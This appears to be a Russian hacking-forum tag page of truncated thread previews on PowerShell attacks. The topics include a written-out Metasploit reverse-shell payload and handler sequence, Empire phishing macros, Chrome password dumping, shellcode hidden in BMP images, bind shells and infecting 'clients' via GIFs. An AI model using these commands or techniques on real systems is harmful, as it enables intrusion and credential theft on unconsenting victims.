powershell attack

  1. V

    В Kali linux не создается сеанс Powershell через payload

    Вобщем проблемма следующая. Не приходит сессия powershell в Kali linux. sudo msfconsole use payload/cmd/windows/powershell_reverse_tcp set lhost set lport generate -f raw use exploit/multi/handler set payload cmd/windows/powershell_reverse_tcp set lhost set lport exploit -j Запускаю на...
  2. Sergiy1306

    Empire

    Здравствуйте) такая проблема) поставил на vware kali linux, установил empire. Хочу с виртуалки на основание систему Windows 10 осуществлять атаку. Возможно ли это? Хочу сделать макросы для фишинга
  3. b0d

    Подскажите вектор атаки по Windows 10

    Тренируюсь проводить пентесты, давно этим не занимался, но решил вспомнить былое. Сетка моей организации, и я сам хакаю себя. Получен доступ в сеть по вайфаю. Найдены машины. Интересует одна, без фильтрованных портов. Картина такая: PORT STATE SERVICE 135/tcp open msrpc 139/tcp open...
  4. V

    Kali Linux Powershell Empire не видит агентов

    Проблема в том,что я,на виртуальной машине с установленным Kali Linux'ом,на программе Powershell Empire пытался подключится к себе при помощи этой же программы,перепробовал все,но ничего не получается.Win 10,Powershell Empire 2.5,Kali linux 2.6
  5. Ondrik8

    Конкурс Злая GIF-ка или веселое заражение "клиентуры"

    Всем привет, решил описать как мне кажется веселый метод заражения наших с вами "любимых клиентов" Все будет как Мы любим, весело, легко и без палевно) Тема была предназначена для Грей-секции но она по каким то причинам упорно не хотела туда ложится по этому и было принято решение выложить сюда...
  6. O

    Dump Chrome Passwords

    Всем привет! Думаю каждый сталкивался с такой проблемой, когда нужно взять пассы, но тот же метерпретер по каким-то причинам не справляется с этой задачей. Обычные стилаки типа You must be registered for see element. убиваются антивирусами, на приватные стиллеры нет денег, либо есть деньги, но...
  7. I

    Статья Внедряем шелл-код meterpreter в картинку BMP

    Всем привет, сегодня расскажу как внедрить в картинку в формате bmp шелл-код для meterpreter. Для этой цели будем использовать утилиту под названием Don't Kill My Cat (DKMC). You must be registered for see element. Краткий алгоритм: 1. Создается полезная нагрузка с meterpreter в формате RAW...
  8. <~DarkNode~>

    Статья PowerShell для хакера (часть IV) [Web Delivery] - доставка полезной нагрузки через Web

    Часть 4 You must be registered for see element. You must be registered for see element. You must be registered for see element. You must be registered for see element. Сегодня подготовительная статья на тему возможности PowerShell с точки зрение ИБ, на которою я еще буду ссылаться в...
  9. <~DarkNode~>

    Статья PowerShell для хакера (часть III) [LuckyStrike - создание вредоносных макросов]

    Часть 3 You must be registered for see element. You must be registered for see element. You must be registered for see element. You must be registered for see element. Привет колеги) Сегодня продолжим обогащать себя возможностями PowerShell с точки зрение информационной...
  10. <~DarkNode~>

    Скрытый BIND SHELL на PowerShell

    You must be registered for see element. Привет колеги. Это будет коротенький пост из серии MustKnow(Нужно Знать). Как бы ничего нового но я посчитал нужным кинуть в копилку форума описания этого метода. Ничего нового мы изобретать с вами не будем,а воспользуемся обычной генерацией полезной...
  11. <~DarkNode~>

    Статья Powershell для хакера (часть II )

    Часть 2 You must be registered for see element. You must be registered for see element. You must be registered for see element. Приветствую вас колеги) В You must be registered for see element. мы научились использовать скрипты от PowerSploit для получение метерпретер сессии. Но вынудить...
  12. <~DarkNode~>

    PowerShell для хакера (часть I )

    Часть 1 You must be registered for see element. You must be registered for see element. Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних. И начнем мы пожалуй сегодня с использования скриптов PowerSploit...
  13. <~DarkNode~>

    Статья Знакомство с PowerShell Empire Framework

    И так привет колеги. Сегодня я хотел бы немного Вас ознакомить с прекрасным ,по моему скромному мнению, продуктом PowerShell Empire Framework. PowerShell Empire Framework - это агент для пост эксплуатации windows систем,написанный полностью на павершеле (серверная часть на питона а клиентская...
  14. <~DarkNode~>

    Статья Быстрый способ получить meterpreter

    Привет колеги. ) Сегодня речь пойдет непосредственно о пост эксплуатации скомпрометированной системы (когда у нас есть командная строка удаленной windows машины от windows 7) и нам нужно расширить функционал своих возможностей с помощью метерпретер сессии метаслоита. Для этого нам отлично...